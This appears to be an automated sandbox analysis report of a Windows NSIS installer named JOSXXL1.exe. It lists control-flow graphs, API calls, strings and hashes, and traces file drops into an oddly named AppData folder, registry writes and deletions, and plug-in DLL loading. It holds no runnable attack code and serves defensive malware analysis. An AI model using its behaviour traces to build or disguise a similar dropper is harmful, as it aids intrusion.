                                                                                                        control_flow_graph 289 4039cc-4039e4 call 406559 292 4039e6-4039f6 call 4060ca 289->292 293 4039f8-403a2f call 406050 289->293 302 403a52-403a7b call 403ca2 call 405c3f 292->302 298 403a31-403a42 call 406050 293->298 299 403a47-403a4d lstrcatW 293->299 298->299 299->302 307 403a81-403a86 302->307 308 403b0d-403b15 call 405c3f 302->308 307->308 309 403a8c-403ab4 call 406050 307->309 314 403b23-403b48 LoadImageW 308->314 315 403b17-403b1e call 4061a5 308->315 309->308 316 403ab6-403aba 309->316 318 403bc9-403bd1 call 40140b 314->318 319 403b4a-403b7a RegisterClassW 314->319 315->314 320 403acc-403ad8 lstrlenW 316->320 321 403abc-403ac9 call 405b64 316->321 330 403bd3-403bd6 318->330 331 403bdb-403be6 call 403ca2 318->331 322 403b80-403bc4 SystemParametersInfoW CreateWindowExW 319->322 323 403c98 319->323 328 403b00-403b08 call 405b37 call 406183 320->328 329 403ada-403ae8 lstrcmpiW 320->329 321->320 322->318 327 403c9a-403ca1 323->327 328->308 329->328 334 403aea-403af4 GetFileAttributesW 329->334 330->327 342 403bec-403c06 ShowWindow call 4064ed 331->342 343 403c6f-403c70 call 4053b5 331->343 337 403af6-403af8 334->337 338 403afa-403afb call 405b83 334->338 337->328 337->338 338->328 350 403c12-403c24 GetClassInfoW 342->350 351 403c08-403c0d call 4064ed 342->351 346 403c75-403c77 343->346 348 403c91-403c93 call 40140b 346->348 349 403c79-403c7f 346->349 348->323 349->330 352 403c85-403c8c call 40140b 349->352 355 403c26-403c36 GetClassInfoW RegisterClassW 350->355 356 403c3c-403c5f DialogBoxParamW call 40140b 350->356 351->350 352->330 355->356 360 403c64-403c6d call 40391c 356->360 360->327
                                                                                                        APIs
                                                                                                          • Part of subcall function 00406559: GetModuleHandleA.KERNEL32(?,?,00000020,00403422,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040656B
                                                                                                          • Part of subcall function 00406559: GetProcAddress.KERNEL32(00000000,?), ref: 00406586
                                                                                                        • lstrcatW.KERNEL32(1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\JOSXXL1.exe"), ref: 00403A4D
                                                                                                        • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\indvandrings\attraavrdig,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,74DF3420), ref: 00403ACD
                                                                                                        • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\indvandrings\attraavrdig,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000), ref: 00403AE0
                                                                                                        • GetFileAttributesW.KERNEL32(Call), ref: 00403AEB
                                                                                                        • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\indvandrings\attraavrdig), ref: 00403B34
                                                                                                          • Part of subcall function 004060CA: wsprintfW.USER32 ref: 004060D7
                                                                                                        • RegisterClassW.USER32(00429200), ref: 00403B71
                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B89
                                                                                                        • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403BBE
                                                                                                        • ShowWindow.USER32(00000005,00000000), ref: 00403BF4
                                                                                                        • GetClassInfoW.USER32(00000000,RichEdit20W,00429200), ref: 00403C20
                                                                                                        • GetClassInfoW.USER32(00000000,RichEdit,00429200), ref: 00403C2D
                                                                                                        • RegisterClassW.USER32(00429200), ref: 00403C36
                                                                                                        • DialogBoxParamW.USER32(?,00000000,00403D6F,00000000), ref: 00403C55
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                        • String ID: "C:\Users\user\Desktop\JOSXXL1.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\indvandrings\attraavrdig$Call$Control Panel\Desktop\ResourceLocale$H7B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • GetTickCount.KERNEL32 ref: 00402E55
                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\JOSXXL1.exe,00000400), ref: 00402E71
                                                                                                          • Part of subcall function 00405D58: GetFileAttributesW.KERNELBASE(00000003,00402E84,C:\Users\user\Desktop\JOSXXL1.exe,80000000,00000003), ref: 00405D5C
                                                                                                          • Part of subcall function 00405D58: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405D7E
                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\JOSXXL1.exe,C:\Users\user\Desktop\JOSXXL1.exe,80000000,00000003), ref: 00402EBA
                                                                                                        • GlobalAlloc.KERNELBASE(00000040,?), ref: 00403001
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                        • String ID: "C:\Users\user\Desktop\JOSXXL1.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\JOSXXL1.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\indvandrings\attraavrdig,?,?,00000031), ref: 004017A8
                                                                                                        • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\indvandrings\attraavrdig,?,?,00000031), ref: 004017CD
                                                                                                          • Part of subcall function 00406183: lstrcpynW.KERNEL32(0040A230,0040A230,00000400,00403466,00429260,NSIS Error), ref: 00406190
                                                                                                          • Part of subcall function 004052E2: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 0040531A
                                                                                                          • Part of subcall function 004052E2: lstrlenW.KERNEL32(00402E19,Skipped: C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 0040532A
                                                                                                          • Part of subcall function 004052E2: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll,00402E19,00402E19,Skipped: C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll,00000000,00000000,00000000), ref: 0040533D
                                                                                                          • Part of subcall function 004052E2: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll), ref: 0040534F
                                                                                                          • Part of subcall function 004052E2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405375
                                                                                                          • Part of subcall function 004052E2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538F
                                                                                                          • Part of subcall function 004052E2: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040539D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\nstA69B.tmp$C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll$C:\Users\user\AppData\Local\indvandrings\attraavrdig$Call

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 0040531A
                                                                                                        • lstrlenW.KERNEL32(00402E19,Skipped: C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 0040532A
                                                                                                        • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll,00402E19,00402E19,Skipped: C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll,00000000,00000000,00000000), ref: 0040533D
                                                                                                        • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll), ref: 0040534F
                                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405375
                                                                                                        • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538F
                                                                                                        • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040539D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                        • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll
                                                                                                        • API String ID: 2531174081-287984335
                                                                                                        • Opcode ID: 249834775a828849fb4d2b6e85db5a2f2ebd467982b82e73c19976ad16bb4df1
                                                                                                        • Instruction ID: 5ed309c8d3f1bf46da027166848d039c97de4a2eecd53fde705ce25c05ecf2d8
                                                                                                        • Opcode Fuzzy Hash: 249834775a828849fb4d2b6e85db5a2f2ebd467982b82e73c19976ad16bb4df1
                                                                                                        • Instruction Fuzzy Hash: 4A21B075900618BBCB119FA5DD44ACFBFB8EF84390F10803AF904B62A0C7B94A51DF68

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 640 4057b1-4057fc CreateDirectoryW 641 405802-40580f GetLastError 640->641 642 4057fe-405800 640->642 643 405829-40582b 641->643 644 405811-405825 SetFileSecurityW 641->644 642->643 644->642 645 405827 GetLastError 644->645 645->643
                                                                                                        APIs
                                                                                                        • CreateDirectoryW.KERNELBASE(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\), ref: 004057F4
                                                                                                        • GetLastError.KERNEL32 ref: 00405808
                                                                                                        • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040581D
                                                                                                        • GetLastError.KERNEL32 ref: 00405827
                                                                                                        Strings
                                                                                                        • Error writing temporary file. Make sure your temp folder is valid., xrefs: 004057D8
                                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 004057D7
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.
                                                                                                        • API String ID: 3449924974-3539136105
                                                                                                        • Opcode ID: 7075ef3404a36deb5860a48c063ce1528caeb3231ff3312c7ad9e757cbb6b53e
                                                                                                        • Instruction ID: 9d8b3aa145bda6eaeb46bbd44b0caf250caa68881350f4f3315e0aaa1c0c1a31
                                                                                                        • Opcode Fuzzy Hash: 7075ef3404a36deb5860a48c063ce1528caeb3231ff3312c7ad9e757cbb6b53e
                                                                                                        • Instruction Fuzzy Hash: 400108B1D00619EADF10DBA0D9087EFBFB8EF04314F00803AD945B6190D77996588FA9

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 646 40237b-4023c1 call 402cb4 call 402bbf * 2 RegCreateKeyExW 653 4023c7-4023cf 646->653 654 402a4c-402a5b 646->654 656 4023d1-4023de call 402bbf lstrlenW 653->656 657 4023e2-4023e5 653->657 656->657 660 4023f5-4023f8 657->660 661 4023e7-4023f4 call 402ba2 657->661 662 402409-40241d RegSetValueExW 660->662 663 4023fa-402404 call 4030e7 660->663 661->660 668 402422-4024fc RegCloseKey 662->668 669 40241f 662->669 663->662 668->654 671 40281e-402825 668->671 669->668 671->654
                                                                                                        APIs
                                                                                                        • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
                                                                                                        • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nstA69B.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
                                                                                                        • RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nstA69B.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nstA69B.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseCreateValuelstrlen
                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\nstA69B.tmp
                                                                                                        • API String ID: 1356686001-3671796336
                                                                                                        • Opcode ID: 4fa074726b7e2bf8854870b0d1666f31c0fefbbcc168a0cac51504e48151ff81
                                                                                                        • Instruction ID: 75ab489ca3c386883e02df54fe3069bb457763bdb47647990c5a7a2e11d383c6
                                                                                                        • Opcode Fuzzy Hash: 4fa074726b7e2bf8854870b0d1666f31c0fefbbcc168a0cac51504e48151ff81
                                                                                                        • Instruction Fuzzy Hash: B8118E71A00108BFEB10AFA5DE89EAE777DEB44358F11403AF904B71D1D6B85E409668

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 672 402bff-402c28 RegOpenKeyExW 673 402c93-402c97 672->673 674 402c2a-402c35 672->674 675 402c50-402c60 RegEnumKeyW 674->675 676 402c62-402c74 RegCloseKey call 406559 675->676 677 402c37-402c3a 675->677 685 402c76-402c85 676->685 686 402c9a-402ca0 676->686 678 402c87-402c8a RegCloseKey 677->678 679 402c3c-402c4e call 402bff 677->679 683 402c90-402c92 678->683 679->675 679->676 683->673 685->673 686->683 687 402ca2-402cb0 RegDeleteKeyW 686->687 687->683 688 402cb2 687->688 688->673
                                                                                                        APIs
                                                                                                        • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?), ref: 00402C20
                                                                                                        • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00402C65
                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00402C8A
                                                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Close$DeleteEnumOpen
                                                                                                        • String ID:
                                                                                                        • API String ID: 1912718029-0
                                                                                                        • Opcode ID: ee17cb36fc74d046e0919beb455f6a1255652c66a39e7c6080990b88bc0e6a76
                                                                                                        • Instruction ID: 55d087fd23a1ea4965d22b091416ffa41740a626a207a29a44af1da89c0b6843
                                                                                                        • Opcode Fuzzy Hash: ee17cb36fc74d046e0919beb455f6a1255652c66a39e7c6080990b88bc0e6a76
                                                                                                        • Instruction Fuzzy Hash: B3116771504118FFEF20AF90DF8CEAE3B79FB14384B10043AF905B20A0D7B48E55AA29

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 690 10001759-10001795 call 10001b18 694 100018a6-100018a8 690->694 695 1000179b-1000179f 690->695 696 100017a1-100017a7 call 10002286 695->696 697 100017a8-100017b5 call 100022d0 695->697 696->697 702 100017e5-100017ec 697->702 703 100017b7-100017bc 697->703 704 1000180c-10001810 702->704 705 100017ee-1000180a call 100024a9 call 100015b4 call 10001272 GlobalFree 702->705 706 100017d7-100017da 703->706 707 100017be-100017bf 703->707 712 10001812-1000184c call 100015b4 call 100024a9 704->712 713 1000184e-10001854 call 100024a9 704->713 729 10001855-10001859 705->729 706->702 708 100017dc-100017dd call 10002b5f 706->708 710 100017c1-100017c2 707->710 711 100017c7-100017c8 call 100028a4 707->711 721 100017e2 708->721 717 100017c4-100017c5 710->717 718 100017cf-100017d5 call 10002645 710->718 724 100017cd 711->724 712->729 713->729 717->702 717->711 728 100017e4 718->728 721->728 724->721 728->702 733 10001896-1000189d 729->733 734 1000185b-10001869 call 1000246c 729->734 733->694 736 1000189f-100018a0 GlobalFree 733->736 740 10001881-10001888 734->740 741 1000186b-1000186e 734->741 736->694 740->733 743 1000188a-10001895 call 1000153d 740->743 741->740 742 10001870-10001878 741->742 742->740 744 1000187a-1000187b FreeLibrary 742->744 743->733 744->740
                                                                                                        APIs
                                                                                                          • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
                                                                                                          • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
                                                                                                          • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                                                                        • FreeLibrary.KERNEL32(?), ref: 1000187B
                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 100018A0
                                                                                                          • Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,00001020), ref: 100022B8
                                                                                                          • Part of subcall function 10002645: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B7
                                                                                                          • Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001731,00000000), ref: 100015CD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2337909771.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2337832913.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                        • Associated: 00000000.00000002.2337963642.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                                                                                                        • Associated: 00000000.00000002.2338036438.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_10000000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 1791698881-3916222277
                                                                                                        • Opcode ID: d19b98991503ed1f4222ee02892706a0c20354a75bd4722b3fc13797bb1a772f
                                                                                                        • Instruction ID: d353a68b508970880cf9150dbe01e0f77130c4103e9cfdf2e47557ee24e57a3c
                                                                                                        • Opcode Fuzzy Hash: d19b98991503ed1f4222ee02892706a0c20354a75bd4722b3fc13797bb1a772f
                                                                                                        • Instruction Fuzzy Hash: 5E31BF75804241AAFB14DF749CC9BDA37E8FF053D0F158065FA0A9A08FDF74A9848761

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 747 405d87-405d93 748 405d94-405dc8 GetTickCount GetTempFileNameW 747->748 749 405dd7-405dd9 748->749 750 405dca-405dcc 748->750 752 405dd1-405dd4 749->752 750->748 751 405dce 750->751 751->752
                                                                                                        APIs
                                                                                                        • GetTickCount.KERNEL32 ref: 00405DA5
                                                                                                        • GetTempFileNameW.KERNELBASE(0040A230,?,00000000,?,?,?,00000000,004033B4,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035E2), ref: 00405DC0
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CountFileNameTempTick
                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                        • API String ID: 1716503409-678247507
                                                                                                        • Opcode ID: a547c736c8f6b5c9f15055ff18df3ea68e155a79a10597bb1e750add09701d99
                                                                                                        • Instruction ID: 39f60503b2430839de46f7700192694fdf55f3390a305a77e996ee432cf1c3a1
                                                                                                        • Opcode Fuzzy Hash: a547c736c8f6b5c9f15055ff18df3ea68e155a79a10597bb1e750add09701d99
                                                                                                        • Instruction Fuzzy Hash: 00F01D76701608BFDB108F59DD09A9BB7A8EFA5710F10803BEA41E7190E6B49A54CB64

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 753 4064ed-40650d GetSystemDirectoryW 754 406511-406513 753->754 755 40650f 753->755 756 406524-406526 754->756 757 406515-40651e 754->757 755->754 759 406527-406556 wsprintfW LoadLibraryW 756->759 757->756 758 406520-406522 757->758 758->759
                                                                                                        APIs
                                                                                                        • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406504
                                                                                                        • wsprintfW.USER32 ref: 0040653F
                                                                                                        • LoadLibraryW.KERNELBASE(?), ref: 0040654F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                        • String ID: %s%S.dll
                                                                                                        • API String ID: 2200240437-2744773210
                                                                                                        • Opcode ID: 09826aabd0149e8bfb8f53993160eab8b7fb3c89a4591f3bb3682bc3d10a664a
                                                                                                        • Instruction ID: 11474a94a5346637ca65755d9fadb0746d9ddd5a59e85512782e335858fea3cf
                                                                                                        • Opcode Fuzzy Hash: 09826aabd0149e8bfb8f53993160eab8b7fb3c89a4591f3bb3682bc3d10a664a
                                                                                                        • Instruction Fuzzy Hash: 11F0BB7050011AA7CB14EB68ED0DDAF3AACAB00304F51447A9546F20D5EB7CDA65CBA8
                                                                                                        APIs
                                                                                                          • Part of subcall function 00405BE2: CharNextW.USER32(?,?,00425F50,Error writing temporary file. Make sure your temp folder is valid.,00405C56,00425F50,00425F50,74DF3420,?,74DF2EE0,00405994,?,74DF3420,74DF2EE0,"C:\Users\user\Desktop\JOSXXL1.exe"), ref: 00405BF0
                                                                                                          • Part of subcall function 00405BE2: CharNextW.USER32(00000000), ref: 00405BF5
                                                                                                          • Part of subcall function 00405BE2: CharNextW.USER32(00000000), ref: 00405C0D
                                                                                                        • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 00401612
                                                                                                          • Part of subcall function 004057B1: CreateDirectoryW.KERNELBASE(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\), ref: 004057F4
                                                                                                        • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\indvandrings\attraavrdig,?,00000000,000000F0), ref: 00401645
                                                                                                        Strings
                                                                                                        • C:\Users\user\AppData\Local\indvandrings\attraavrdig, xrefs: 00401638
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                        • String ID: C:\Users\user\AppData\Local\indvandrings\attraavrdig
                                                                                                        • API String ID: 1892508949-3036879226
                                                                                                        • Opcode ID: 897a2145b85dc8eb1e3e25babfe17602016c627361236b588067241378a32ca2
                                                                                                        • Instruction ID: a2f5b5d24782e44cfe925c0e95e15c4f451f46d0d0cd4eeea64ba36cf6c5c766
                                                                                                        • Opcode Fuzzy Hash: 897a2145b85dc8eb1e3e25babfe17602016c627361236b588067241378a32ca2
                                                                                                        • Instruction Fuzzy Hash: AC11E631504504EBCF20BFA0CD0199E3AB1EF44364B29453BE945B61F1DA3D8A81DA5E
                                                                                                        APIs
                                                                                                          • Part of subcall function 00406183: lstrcpynW.KERNEL32(0040A230,0040A230,00000400,00403466,00429260,NSIS Error), ref: 00406190
                                                                                                          • Part of subcall function 00405BE2: CharNextW.USER32(?,?,00425F50,Error writing temporary file. Make sure your temp folder is valid.,00405C56,00425F50,00425F50,74DF3420,?,74DF2EE0,00405994,?,74DF3420,74DF2EE0,"C:\Users\user\Desktop\JOSXXL1.exe"), ref: 00405BF0
                                                                                                          • Part of subcall function 00405BE2: CharNextW.USER32(00000000), ref: 00405BF5
                                                                                                          • Part of subcall function 00405BE2: CharNextW.USER32(00000000), ref: 00405C0D
                                                                                                        • lstrlenW.KERNEL32(00425F50,00000000,00425F50,00425F50,74DF3420,?,74DF2EE0,00405994,?,74DF3420,74DF2EE0,"C:\Users\user\Desktop\JOSXXL1.exe"), ref: 00405C98
                                                                                                        • GetFileAttributesW.KERNELBASE(00425F50,00425F50,00425F50,00425F50,00425F50,00425F50,00000000,00425F50,00425F50,74DF3420,?,74DF2EE0,00405994,?,74DF3420,74DF2EE0), ref: 00405CA8
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                        • String ID: P_B
                                                                                                        • API String ID: 3248276644-906794629
                                                                                                        • Opcode ID: aac1f31e4ea679f556b64dc22f6bcb2e43e03c5f2aa30b7a8abbf531c7fd0fee
                                                                                                        • Instruction ID: f871c4b29d4d639395b2ac54a4c1991ea156a0950635a8c86b9a322ad60a2328
                                                                                                        • Opcode Fuzzy Hash: aac1f31e4ea679f556b64dc22f6bcb2e43e03c5f2aa30b7a8abbf531c7fd0fee
                                                                                                        • Instruction Fuzzy Hash: 32F0F42510CF111AF62233365D09AAF2558CF82764B5A063FFC51B12D1CA3C9A838C7E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 8c1f6239bfa1496998a371feb9f956813f4bb707a4bc8307f638f0ab127b8830
                                                                                                        • Instruction ID: 29bb6eb7f5aafbc6e445c06f8dac873239588b1e002d851f56b7f63b732aee86
                                                                                                        • Opcode Fuzzy Hash: 8c1f6239bfa1496998a371feb9f956813f4bb707a4bc8307f638f0ab127b8830
                                                                                                        • Instruction Fuzzy Hash: A9A14471D00229CBDB28CFA8C844BADBBB1FF44305F21856ED856BB281D7785A86CF44
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: c7b88453d07393fdeb677dd88dae3b78eedf61d9a77563a8484cf44dd47aba53
                                                                                                        • Instruction ID: e1a0b165b1ec2cfc9f877bfb9dcbf2309f9cd93107b4533ef6724984480a2cde
                                                                                                        • Opcode Fuzzy Hash: c7b88453d07393fdeb677dd88dae3b78eedf61d9a77563a8484cf44dd47aba53
                                                                                                        • Instruction Fuzzy Hash: 2A913370D00229CBDF28CFA8C844BADBBB1FF44305F15816AD856BB281C779A986DF45
                                                                                                        Memory Dump Source
